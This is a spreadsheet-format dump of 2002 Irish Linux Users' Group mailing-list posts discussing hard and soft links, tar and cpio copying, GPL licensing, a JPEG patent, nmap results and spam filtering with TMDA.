http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian wrote:
&gt;  however, the data will be read and written twice by the
&gt;  1st (source) `tar', and read twice by the 2nd (sink) `tar',
&gt;  albeit only written once as the sink realizes the second
&gt;  copy is a hard link to the first.Eh?!? Oh wait... Doh. Sorry, I automatically read 'soft' in front of 'links', despite all
evidence to the contrary. I thought the original question was a bit
strange...On that note: is there any real benefit to using hard links? I avoid them as
a rule, and cannot think of any good reason to use them at the moment.-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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 05:06:59PM +0100, Matthew French wrote:&gt; On that note: is there any real benefit to using hard links? I avoid them as
&gt; a rule, and cannot think of any good reason to use them at the moment.There are lots of benefits to using hard links, for all sorts of reasons. In
this case, they are being used to provide two quite different namespaces
for the same set of files.
Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, as many have said, it's non-trivial and not smart enough.I did try just cvs'ing over the existing sources, but cvs complained that my 
files were in the way.Then I thought that I'd only need the DRI stuff, that took about 1.5 hours to 
fetch 116M. Unfortunately I still need the XFree86 cvs stuff as well :-( At 
339M that took almost 3 hours.Now I can start building the XFree86 cvs and DRI cvs stuff for testing the 3D 
patches for my GVX1 card. I just hope I don't completely trash my system in 
the process. Think I'll wait until morning to start building, though. I've been building a 
new box from source this week. A 200Mhz PentiumMMX with 96M. It took a full 
day to build XFree86 4.2.0 and 2.5 days each to build qtlibs and kdelibs. 
kdebase took just under 46 hours. I've got lots of grief from the wife for 
the computer running 'round the clock this week. The rest of KDE should build 
in under 20 hour increments.Cheers,	John Gay
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On July 19, niall@linux.ie said:
&gt; 
&gt; There are lots of benefits to using hard links, for all sorts of reasons. In"...but there is insufficient room in the margin of this email to
 describe them..." :)&gt; this case, they are being used to provide two quite different namespaces
&gt; for the same set of files.Sure, but soft links would do the same. To be honest, I'm trying to
think of a useful use of hard links right now, and I'm a little
stumped. There's gotta be some benefit that I'm missing that's
immediately obvious to everyone.Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me.merde says, "in other news, our mini-blimp blew away."-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Ronan Waide :&gt; Sure, but soft links would do the same. To be honest, I'm trying to
&gt; think of a useful use of hard links right now, and I'm a little
&gt; stumped. There's gotta be some benefit that I'm missing that's
&gt; immediately obvious to everyone.Using Niall's example - single set of files but &gt;1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automatic.Ronan.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 16:15:49 +0100
  | From: Brian Foster 
  |[ ... ]
  |  the issue here is tar(1) (and cpio(1)) archives always
  |  contain the data for each name of a hard link.  [ ... ] ARRGGGHHHH!!!!!
 profuse apologies, the wrong version of my reply was posted
 (blame it on being late for the pub).  ;-( the above is almost pure B*S* --- I got my `tar's and `cpio's
 confused.  what I said _is_ correct, but for cpio(1) archives;
 tar(1) archives do _not_ replicate the data for hard links. I spotted this confusion on my part before I posted my reply,
 and re-wrote it to be more correct, yet somehow the wrong
 version got sent anyways.  ARRGGGHHHH!!!!!  ;-(  ;-(  ;-( anyways, GNU `cpio -p' does not do spurious reads or writes.
 GNU `tar cf - ... | tar xf - ...' also does not, albeit each
 `tar' both reads and writes the data.  hence, there is twice
 (not thrice!) the I/O of `cpio -p', maybe an issue for c.60Gb. using strace(1), I've verified my claim GNU `cpio -p' does
 not do spurious reads or writes, i.e. it link(2)s.  but having
 just come back from the pub, perhaps this should also be taken
 with extra skepticism ......   ;-\ sorry.  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</si>
  <si>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  | Date: Fri, 19 Jul 2002 18:10:40 +0100
  | From: Ronan Waide 
  | 
  | On July 19, niall@linux.ie said:
  | &gt; this case, [hard links] are being used to provide two quite
  | &gt; different namespaces for the same set of files.
  | 
  | Sure, but soft links would do the same. To be honest, I'm trying to
  | think of a useful use of hard links right now, and I'm a little
  | stumped. There's gotta be some benefit that I'm missing that's
  |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 there is no such
 thing as a broken link. I use this fact on occasion to "save" data, via the well-
 known attack of hard-linking to a supposedly-temporary file
 I want to preserve.  the subsequent unlink(2)ing of the
 "temporary" file does not destroy the data.
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</si>
  <si>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Could anyone who is interested clarify this for me.
Or point me in the direction of a site that does GPL case studies where there may be a similar issue. I have had a google around and the PHP site wasn't help full and the GPL page didn't seem to have this senario.The setup is as follows:
I develop a piece of code using PHP 3.0.9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GPL.I know this is not strictly a 'Linux' issue but any help would be appreciatedAnt-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian Foster wrote:
&gt;  I use this fact on occasion to "save" data, via the well-
&gt;  known attack of hard-linking to a supposedly-temporary file
&gt;  I want to preserve.  the subsequent unlink(2)ing of the
&gt;  "temporary" file does not destroy the data.Now here is a thought: a Unix version of the "Deleted Items" folder.In the root of a hard drive, create a directory ".unwanted". Then
periodically create hard links to every file on the hard drive that does not
have hard links.That way, when someone accidentally does "rm *" or whatever, you still have
a link under ".unwanted"Another script can then periodically clear out enough old files to ensure
that there is usually enough disk space.Although this sounds like a horrible hack. It would no doubt be much better
to have a transaction oriented file system with a rollback facility.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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Jul 18, 2002 at 11:13:24PM +0100, John Gay wrote:&gt; kdebase took just under 46 hours. I've got lots of grief from the wife for 
&gt; the computer running 'round the clock this week. The rest of KDE should build Tell her that the computer is less likely to fail if it's never turned off
so you won't need to be spending money on repairs, and that this offsets the
electricity costs.This has the advantage of actually being true (well, up to the , anyway) :-)Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 10:00:02PM +0100, Matthew French wrote:
&gt; Now here is a thought: a Unix version of the "Deleted Items" folder.am i the only one who thinks this is like "friday night 80's" for ilug?
and here's an answer from 1989.  for those perceptive folks in the
audience you'll note that it makes no reference to a windows icons.http://groups.google.com/groups?q=unix+undelete&amp;hl=en&amp;lr=&amp;ie=UTF-8&amp;as_drrb=b&amp;as_mind=12&amp;as_minm=5&amp;as_miny=1981&amp;as_maxd=19&amp;as_maxm=7&amp;as_maxy=1989&amp;selm=10113%40bloom-beacon.MIT.EDU&amp;rnum=10and here's one from 1984:http://groups.google.com/groups?q=unix+undelete&amp;start=10&amp;hl=en&amp;lr=&amp;ie=UTF-8&amp;as_drrb=b&amp;as_mind=12&amp;as_minm=5&amp;as_miny=1981&amp;as_maxd=19&amp;as_maxm=7&amp;as_maxy=1989&amp;selm=736%40sri-arpa.UUCP&amp;rnum=14on a more serious note....  would unrm be nice?  yeah.  but people have
talked about unrm for nearly ***20*** years - and that's just what i
bothered to look up.  think about it.  in that time bsd has been freed
from at&amp;t and then forked in four different directions, gcc, linux,
mozilla, gnome and kde have been written.  as has almost every bit
of the gnu project - including (sh|file)-utils.  and think about it,
have the gnu (sh|file)-utils developers ever met an option they didn't
implement if they could?  even /bin/true and /bin/false take arguments.so yeah, unrm would be nice, but obviously it's not a simple problem.
millions of lines of code, hundreds of projects, no unrm.  heck, the
hurd will probably release 1.0 before unrm shows up.kevin, spinning the oldies all night long...--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</si>
  <si>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Fri, Jul 19, 2002 at 09:53:16PM +0100, awhalley@eircom.net wrote:
&gt; The setup is as follows:
&gt; I develop a piece of code using PHP 3.0.9 which is, to
&gt; my knowledge, GPL. php's license is completely irrelevant to this.  think about it.
solaris releases their system which includes /bin/sh.  their license
is very restrictive and they retain the rights to their whole system.
but they don't own every shell script ever written by solaris admins
around the world.&gt; The piece of code runs on my server and is an integral part of a system
&gt; that I have developed for a client. I did not recieve  payment for this
&gt; particular piece of code but I did recieve payment for the system. My
&gt; client now wants to use a different service provider but keep my code.
&gt; Do I have a right to claim intellectual property rights for  my little
&gt; piece of code that he did not pay me for or do I have to give the
&gt; client the code under the GPL.i doubt it.  and i suspect it would cost more to litigate then you
would get.kevin--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</si>
  <si>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Fri, Jul 19, 2002 at 06:10:40PM +0100, Ronan Waide wrote:
&gt; Sure, but soft links would do the same. To be honest, I'm trying to
&gt; think of a useful use of hard links right now, and I'm a little
&gt; stumped. There's gotta be some benefit that I'm missing that's
&gt; immediately obvious to everyone.mh used them nicely.  mh stores one message per file.  the refile command
allows you to move a message from one folder to another *or* link it to
another folder.  it uses hard links to do this.  this would suck to if
it used soft links - what if i later deleted the actual file?kevin--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</si>
  <si>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Thursday 18 July 2002 14:49, Ray Kelly wrote:
&gt; one basic option that I know of is Squidalyser, http://ababa.org/
&gt; This doesn't do everything that you want but I've found
&gt; it useful myself on a number of fronts
&gt; Now it won't hive off things that have been downloaded but
&gt; it your cache is so tuned and you've got the dick space you
&gt; can keep some rather large objects in that.dick space?
large objects?This is ILUG right?-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Jul 22, 2002 at 03:48:54PM +0100, Justin MacCarthy mentioned:
&gt; Never having to support a large network myself, I know very little about
&gt; this..  but what do lex &amp; yacc have to do with anything ?
&gt; These are language parsers, used to build complilers / interptreters  and
&gt; the like???!!! Bind configs are one sort of file. I think the person asking Kevin the question would like to have a nice
config language like: domain: "bing.com"
 hosts:  www mail arse smeg twitter
 ttl:    20000 and then using lex &amp; yacc, they could write a program that converts
between that config file, and the tedious bind configs, and maybe even
auto-generate a reverse DNS config file while they are at it. Personally, I think they are demented. It's much more a job for something
simple like Sed or Awk. People using lex &amp; yacc just because they can make
baby jesus cry.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Howdy all, I have a friend with the problem outlined below, suggestions anyone?
"I have a dell inspirion 2650 laptop, with a P4 1.6GHz proc., an Nvidia Geforce II graphics card (8Mb) and am trying  to 
install redhat 7.3 .
The installation goes nicely until the Xwindows setup. My graphics card IS detected but not the monitor. I have  
randomly chosen various LCD laptop display monitors but none seem to work, problem is that when i test a  particular 
monitor the screen doesn't default back to the nice clear picture  i have become acustomed to but  remains fuzzy and 
flashy so it is impossible to test another monitor type. rebooting allows me to run in text mode  where i try to configure X 
again with Xconfigurator but i run into the same problem again.Very annoying..."Ta very, R----------------------------------------
Richard Eibrand,
School of Computing
Dublin Institute of Technology
Kevin Street, Dublin 8
IrelandOffice : 	+353 1 402 4682
Mobile : 	+353 87 618 1793
Email  : 	richard.eibrand@dit.ie, 
         	reibrand@maths.kst.dit.ie -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 09:33:35PM +0100, kevin lyda mentioned:
&gt; &gt;  &gt; apparently some systems limited soft links to the same device but
&gt; &gt;  &gt; gave up after a while.  
&gt; &gt; Why?
&gt; to make them consistent with hard links. That's something that POSIX would do - make every platform as equally
broken, rather than standing up and saying "how about we try &amp; make
everyone better". (why ? Because in the real world, you can't. Somethings just suck)Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I upgraded from RH 7.2 to RH 7.3 over the weekend and now the network card
has died, when I take a look at the network configuration tool it tells me
the card is inactive and when I try to activate it the operation fails. I
cant seem to find 3C905C software on the web ! Any ideas ?Cheers
Liam************************************************************E-mail Disclaimer: This e-mail message and any attachments may contain information, which is
confidential , privileged or commercially sensitive, the content of which
may not be disclosed or used by anyone other then the named addressee.  If
you have received this e-mail in error please notify the sender immediately
and delete this e-mail from your system. BGE does not accept any responsibility for the accuracy or completeness of
the contents of this e-mail or its attachments or for any statements or
contractual commitments contained in this e-mail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www.bge.ie ************************************************************-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Ronan Waide wrote:
&gt; Having skimmed over the patent, it appears to be describing a sort of
&gt; image compression algorithm which gels more or less with the JPEG
&gt; mechanism. Since I don't quite understand how jpeg works (it's hard
&gt; math, and I'm just a dumb comp. eng.)It's not hard math - jpeg is a straight block-based DCT with
quantisation - which is about the oldest image compression
algorithm out there, and I think certainly predates 1986. So I
really have no idea what they claim they've patented - doin DCT
on 8x8 blocks of an image, quantising the resulting coefficients,
or DCT in general? I'm extremely skeptical about this whole
story...&gt; I don't know how exactly it
&gt; matches up to JPEG. I'm more curious as to whether it covers MPEG,
&gt; because it /is/ described in the context of video streams rather than
&gt; stills, and I had a vague impression that the MPEG and JPEG
&gt; compression techniques were similar. One of the patents it references
&gt; also seems to hint at MPEG.MPEG 1, 2, 4 or 7? They're all very different compression
algorithms.Anyway, here's to ogg, and hopefully the future mpeg4-standard
compression algorithm the project comes up with (fingers
crossed). And I wouldn't worry about the jpeg thing - in addition
the patent runs out next year, and I would suggest that having
failed to protect their IP for 15 years, as (iirc) is their
responsibility, their claim would probably never hold up in
court.Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002, kevin lyda wrote:&gt; go after next?  how many jpeg rendering/creating apps/os's has ms
&gt; distributed to their customers since 1986?pah.. MS'd just buy them. (and i'm sure they'd happy for this to
happen).&gt; kevinoh yes, see you've setup that tdma thingy, so here's a thought. do
you reckon spammers (or the software they use) is/are smart enough to	s/\(.\)+\+.*@\([a-zA-Z\.0-9\-]\)/\1@\2/on email addresses? it's a fairly old trick, so i dont see why they
wouldnt.personally, i rarely get spam to any of the plussed addresses
i've given out - i think i've only ever gotten /one/ cause ebay 
seem to have sold on my address. apart from that - never, not even 
to +usenet, so i wonder whether harvesting software does the above.regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
Fortune:
Thus spake the master programmer:
	"After three days without programming, life becomes meaningless."
		-- Geoffrey James, "The Tao of Programming"
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a situation with a small network as follows:A number of client workstations which are running VMware, each of which will
run a local copy of Samba (not the VMware autoinstalled version) to let
VMware access local linux disks.An NIS/NFS server which will also run Samba to allow the VMware clients
access to its filesystems.How can I set things up so that all the VMware clients (all running 'doze
98, possibly being upgraded in future to W2K) authenticate against the NIS
server's Samba ? I have read the Samab documentation in  large quantities
down through the years but as I've never wanted to do anything like this, I
never paid much attention to all the stuff about domain controllers etc.
which I presume is what I will need to have running here.I would also like, if at all possible, to have synchronisation of passwords
between the NIS domain and the NIS server's Samba with minimal manual
intervention.Ideas, accompanied by annotated Samba configration files :-) , gratefully
received.
Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 07:06:06PM +0100, John Gay wrote:
&gt; I am wondering if the C, and other libraries  should be re-built? Can they 
&gt; take advantage of the Pentium and MMX instructions for system performance? 
&gt; And would this require re-building gcc as well?glibc is a likely candidate.&gt;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US$15).Later,
Kenn-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> Has anyone used (successfully!) a fat undelete program on Linux ? Something like a simple version of the norton disk tools would be fine.
Actually, most likely the MS DOS "undelete" program would do...Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I had posted previously about the 2.4 kernel using iptables I ran nmap
against. The IPID sequence generation was all zeros. Someone said this was
indicative of earlier kernels but was fixed about 2.4.5 version. Since I'm
running the latest what is causing this? I ran nmap against a 2.2 kernel
using chains and it had better results than the stock 2.4 kernel.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On July 21, paul@clubi.ie said:
&gt; 
&gt; reiser's handles to files are hashes i believe. fat: dont think you 
&gt; can make symlinks on it.You can't; hard links only. And those get cleaned up by ScanDisk as
"cross-linked files". Shortcuts are the Windows analogue of symlinks,
and they don't work outside the Windows environment - i.e. they're an
artifact of the OS rather than the FS.Cheers.
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me.
"if you can't live the lie, let it die/and if you can't live a life filled
 with strife/honey, just say oops/and jump through hoops/and get to the end of
 the line" - FLC, "Bear Hug" (Come Find Yourself)-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 07:03:17PM +0100, kevin lyda wrote:&gt; &gt; &gt; I know this is not strictly a 'Linux' issue but any help would be appreciated
&gt; &gt; Microsoft has very much made this a Linux issue - it has attempted to imply
&gt; &gt; that any company using GPL software must make everything it owns public and
&gt; &gt; it must be true - that nice man from Microsoft wouldn't lie, would he ?
&gt; 
&gt; but that's just stupid.  microsoft s/w covers a subset of applicationsYou know it's stupid - I know it's stupid. Nonetheless, Microsoft has tried
to spread FUD about the viral nature of the GPL to make CEO/CIO level people
(often not the most technically clueful, even the CIOs) fear that if they so
much as use a Linux box, as, say, a print server, they'll have to make their
company's entire IP public. (I don't think Microsoft said precisely what I
jsut said, but that was the tenor of the remarks). And their marketing
budget is a tad bigger than yours or mine.Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 19 Jul 2002 23:38:09 +0100
Brian Foster claiming to think:&gt;  but, like the classic techniques, there is no rolling
&gt;  back of accidental overwrites.
&gt; 
&gt;  ( rolling back overwrites reminds me of the "snapshot"
&gt;   facility on NetWork Appliance fileservers.  and of the
&gt;   various "versioning" filesystems which appeared --- and
&gt;   then vanished? --- over the years.... )
&gt; 
and it's in FreeBSD 5.0-CURRENT AFAIK.../me migrates every linux box to the one true way..L.
-- 
     dBP   dBBBBb | If you're looking at me to be an accountant
              dBP | Then you will look but you will never see
   dBP    dBBBK'  | If you're looking at me to start having babies
  dBP    dB' db   | Then you can wish because I'm not here to fool around
 dBBBBP dBBBBP'   | Belle &amp; Sebastian (Family Tree)-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 08:48:30PM +0100 or so it is rumoured hereabouts, 
John Gay thought:
&gt; 
&gt; xanim can, and does play them correctly though. Unfortunately xanim does not 
&gt; have any position control so you just have to listen to the album from start 
&gt; to finish.
&gt; 
&gt; What I would like to do is split up the tracks and convert them the mp3 for 
&gt; xmms. I'm jsut not sure what tools would be able to handle these strange 
&gt; compressed wav's that only xanim seems to recognise? I like the albums, but No idea if it can do these ones but mxv (or MixViews) has lots of
configurables and it's whole purpose is to edit wavs.  I've used it to
split up tapes into individual songs.  Not sure of a URL but the author is
atMixViews@create.ucsb.eduConor
-- 
Conor Daly Domestic Sysadmin :-)
---------------------
Faenor.cod.ie
 11:29pm  up 59 days,  8:46,  0 users,  load average: 0.05, 0.05, 0.01
Hobbiton.cod.ie
 11:17pm  up 2 days,  5:54,  2 users,  load average: 0.00, 0.03, 0.00-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On July 19, kevin+dated+1027480289.5c6047@ie.suberic.net said:
&gt; http://biz.yahoo.com/bw/020711/110249_1.html
&gt; 
&gt; oh, and look, sony already caved:
&gt; 
&gt;     http://biz.yahoo.com/bw/020610/100215_2.html
&gt; 
&gt; it generated over 1000 comments on /..  might be an idea to look into
&gt; png's.  in the meantime it will be amusing to see who they'll go after
&gt; next?  how many jpeg rendering/creating apps/os's has ms distributed to
&gt; their customers since 1986?
&gt; 
&gt; kevinHaving skimmed over the patent, it appears to be describing a sort of
image compression algorithm which gels more or less with the JPEG
mechanism. Since I don't quite understand how jpeg works (it's hard
math, and I'm just a dumb comp. eng.) I don't know how exactly it
matches up to JPEG. I'm more curious as to whether it covers MPEG,
because it /is/ described in the context of video streams rather than
stills, and I had a vague impression that the MPEG and JPEG
compression techniques were similar. One of the patents it references
also seems to hint at MPEG.Let's all use PNG, eh? *cough* *wheeze*Cheers,
Waider.
-- 
waider@waider.ie / Yes, it /is/ very personal of me."It would be hard to design a worse outdoor chair without making it
 irresistably delicious to squirrels." - L. Fitzgerald Sjoberg-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">As far as I can remember, the fact that the IPID is zero was introduced into
2.4 was to introduce correct behaviour, i.e. in the case where it is not
needed, it is set to zero.  This was discussed on bugtraq a while
ago....lemme see...
http://cert.uni-stuttgart.de/archive/bugtraq/2002/03/msg00372.html shows a
message from nmap's author on the subject.  The only thing having IPID==0
achieves is that you have one more criteria on which to base your OS
fingerprint which isn't really much of a problem to be honest.Stop worrying about it :)Cheers,
jr
----- Original Message -----
From: "Paul O'Neil" 
To: 
Sent: Monday, July 22, 2002 1:50 PM
Subject: [ILUG] nmap results
&gt; I had posted previously about the 2.4 kernel using iptables I ran nmap
&gt; against. The IPID sequence generation was all zeros. Someone said this was
&gt; indicative of earlier kernels but was fixed about 2.4.5 version. Since I'm
&gt; running the latest what is causing this? I ran nmap against a 2.2 kernel
&gt; using chains and it had better results than the stock 2.4 kernel.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</si>
  <si>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 xml:space="preserve">On Fri, Jul 19, 2002 at 11:47:39PM +0100, Niall O Broin wrote:
&gt; &gt; I know this is not strictly a 'Linux' issue but any help would be appreciated
&gt; Microsoft has very much made this a Linux issue - it has attempted to imply
&gt; that any company using GPL software must make everything it owns public and
&gt; it must be true - that nice man from Microsoft wouldn't lie, would he ?but that's just stupid.  microsoft s/w covers a subset of applications
that are under the gpl.  there are gpl word processors, there's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can't copy,
distribute or modify their s/w; you can't sell it multiple times.so does anyone think that applies to their wp documents or their visual
c++ code?kevin--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</si>
  <si>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Sun, Jul 21, 2002 at 11:12:34PM +0100, Paul Jakma wrote:
&gt; oh yes, see you've setup that tdma thingy, so here's a thought. do
&gt; you reckon spammers (or the software they use) is/are smart enough to
&gt; 
&gt; 	s/\(.\)+\+.*@\([a-zA-Z\.0-9\-]\)/\1@\2/
&gt; 
&gt; on email addresses? it's a fairly old trick, so i dont see why they
&gt; wouldnt.the dated address that my from appears as is a good address for five days
for anyone.  after that it requires a confirm message from the sender.
my regular email address requires a confirm address if i haven't
explicitly given permission to the sender.and yes, spammers could try to set up a system to reply to my confirm
messages, but that would require them to a) give out a valid email address
in their From headers, and b) use a lot more bandwidth then they do now
(thereby costing them more money).oh, and they can't forge confirm messages.  the confirm message system
works something like this:    message goes in the pending q and is assigned an id.
    that id is encrypted and used to create the from address of the
	outgoing confirm mail - kevin+confirm+kghdsfg@ie.suberic.net
    only a message to that address will work to free the message from
	the q (or i can free it using tmda-pending).all of this is discussed on http://tmda.sf.net/kevin--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</si>
  <si>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I've been playing with an old Dell OptiPlex5110 and decided to attempt to 
build a PentiumMMX optimised Linux on it.To start, I installed the bare minimum Debian system for  compiling programs.Next I built a custom kernel, since most CPU optimizations are best suited to 
the kernel code.Next I built X4.2.0 from sources, especially since X make a lot of use of 
matrixes and can also benifit from MMX optimizations. Since the first build, 
I've been encouraged to play with the CVS of both XFree86 and the DRI stuff, 
so I will be re-building X once we get some bugs worked out.Finally I built KDE3.0BETA1 from sources I had, again to take full advantage 
of the MMX processor.Can anyone recommend other minimum tools that I should re-build to get even 
more improvements in system performance? I know that not all packages can, or 
do benefit from being built on PentiumMMX rather than the i386 that Debian 
compiles to, but have I covered everything that CAN benefit?I am wondering if the C, and other libraries  should be re-built? Can they 
take advantage of the Pentium and MMX instructions for system performance? 
And would this require re-building gcc as well?I realise that not everything can benefit from re-compiling. I.E. I doubt I 
would see much system improvement if I re-compile bash, but things like the 
kernel, X and KDE should improve performance.On a related note, I know I've mentioned here before, but I'm still looking 
for a Slot 1 550Mhz PIII. My regular system is a Dual PII350 and the 440BX 
M/B can take PIII's. I managed to get my hands on one. If I could get another 
I could put the two PIII's into this box and re-compile X to use the 
SSE/Katmai instructions in the PIII. I just don't thing it is worth replacing 
two PII's with one PIII. I know that they are out-of-stock, and I do watch 
the Buy-N-Sell regularly, but short of buying a full PIII system, I've not 
had much luck.Cheers,	John Gay-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 01:47:39AM +0100, Paul Jakma wrote:
&gt; isnt this standard behaviour?? mv uses rename() which replaces the
&gt; new path name:why, yes.  yes it is.  i think that was my point.&gt; yes it does. :)
&gt; 
&gt; but your super-links dont is what you're saying i guess. but why? why
&gt; would you want a symlink, bar, linking to foo, to stop linking if foo
&gt; is changed?uh, i wouldn't.  i was referring to the previous message which discussed
the idea of a symlink that referred to a 64 bit device id and the inode
of the file.  i gave two examples of why it wouldn't work.&gt; &gt;     % ln -ss foo bar
&gt; &gt;     % ls -i foo
&gt; &gt;     111 foo
&gt; &gt;     % rm foo
&gt; &gt;     % touch floyd
&gt; &gt;     % ls -i floyd
&gt; &gt;     111 floyd
&gt; is this an example of inode reuse? :) or do you mean that somehow 
&gt; floyd is the new foo, (foo is dead, all hail floyd) and that bar now 
&gt; points to floyd?yes.  i did fail to mention that floyd might not use inode 111, but
it might.  and that was my point, having these mythical symlinks point
to the device+inode is not simple.  just like the unrm thing, it might
be possible, but hard links and soft links are the best implementations
that have survived to date on unix.  windows shortcuts are kinda weird -
they're really an application level thing.mac aliases seem to take the idea of unix symlinks (linking by filename)
along with the concept of device+inode.  i don't know mac internals,
but i seem to remember being told it tried the former first, and then
tried the latter.  how it would deal with the 2nd example i mentioned i
dunno - i'm not certain if the mac version of inodes would suffer from
that (maybe the fs identifier for the file included the creation time
or something like that).&gt; how do i control this 'symlinks magically link to new files' feature?i think it would be difficult.  it would also fail to work in numerous
situations.kevin--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</si>
  <si>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Use the GUI and don't delete files, use the other option, whats it called
again, the dustbin or something ;-)Conor who only knows about symbolic links ;-))I'm pretty sure that I have a softlink from
/mnt/public/mnt/public/downloads/Linux/wasteCPU/setiathome to
/home/cwynne/setiThe /mnt/pub....../seti.. directory resides on an external raidvolume and
/home/../seti is on the internal IDE2 drive. 
So I dont have to cd around the gaf. I suppose that would count as across
different devices. If you're wondering [probably not] why /mnt/public is there twice, its
because I restored from tapebackup and I didn't know that it keeps the
directory structure. I know now ;-)Actually, how can I fix that quickly and easily? I thought about firstly
mv'ing the structure to /tmp. Then copying it back again but I'm sure some
wee genius knows a quickie solution. Mind you I never even bothered trying a
its not a priority now that its all linked anyway. CW--------------------------------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</si>
  <si>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
 Ar an 20Ãº lÃ¡ de mÃ­ 7, scrÃ­obh kevin lyda : &gt; On Sat, Jul 20, 2002 at 08:24:47PM +0100, Aidan Kehoe wrote:
 &gt; &gt;  Ar an 20Ãº lÃ¡ de mÃ­ 7, scrÃ­obh kevin lyda :
 &gt; &gt;  &gt; actaully i think soft links were invented because you can't hard link
 &gt; &gt;  &gt; directories. 
 &gt; &gt; But you could hard link directories, back when soft links were
 &gt; &gt; being invented, AFAIK. 
 &gt; 
 &gt; that was before my time.  all unix systems i've used didn't allow hard
 &gt; links to directories, or if they did they were restricted to root.
 &gt; the reason why is because you could cause infinite loops in the kernel -
 &gt; usually a bad place for infinite loops.Yeah, thanks. I have been subscribed for more than a week, despite any
naÃ¯vetÃ© I may be showing to you :-) .  &gt; &gt;  &gt; apparently some systems limited soft links to the same device but
 &gt; &gt;  &gt; gave up after a while.  
 &gt; &gt; Why?
 &gt; 
